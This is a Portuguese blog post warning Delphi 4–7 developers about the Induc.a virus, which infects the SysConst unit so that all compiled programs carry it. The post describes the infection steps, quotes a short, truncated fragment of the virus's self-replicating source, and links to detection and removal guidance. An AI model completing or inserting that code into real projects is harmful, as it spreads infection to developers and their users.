Subscribe to RSSVirus infecta .dcu de Delphi 4, 5, 6 e 7
Um vírus chamado Virus.Win32.Induc.a, não infecta executáveis, ele procura por uma das versões de Delphi citadas para infectar a unit SysConst.
Ele copia a unit SysConst.pas para \Lib e adiciona código, faz um backup de SysConst.dcu, chamado SysConst.bak. Compila \Lib\SysConst.pas criando uma versão infectada de SysConst.dcu. O arquivo .pas modificado é excluído.
"uses windows;
var sc:array[1..24] of string=('uses windows; var sc:array[1..24]
of string=(', 'function x(s:string):string;var i:integer;
begin for i:=1 to length(s) do if s[i]','=#36 then s[i]:=#39;
result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:
FILETIME;begin','h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);
if h<>DWORD(-1) then begin CloseHandle', "
Resultado – qualquer programa compilado com Delphi será infectado. Talvez este vírus não seja uma grande ameaça e também não é a primeira vez que este tipo de propagação é visto, o código por si só é primitivo e há outros métodos mais simples de infectar os computadores.
Se você usa alguma destas versões de Delphi, verifique se não está infectado, pois seus clientes serão infectados também. E considere atualizar para o Delphi 2010, pois esta atualização realmente vale a pena.
Fonte: http://www.viruslist.com/en/weblog?weblogid=208187826
Veja no blog do Eureka Log como identificar se seu Delphi está infectado e como remover.
http://blog.eurekalog.com/?p=244
1 Comments
[...] Cesar Romero Tags: Delphi, Virus Delphi, [...]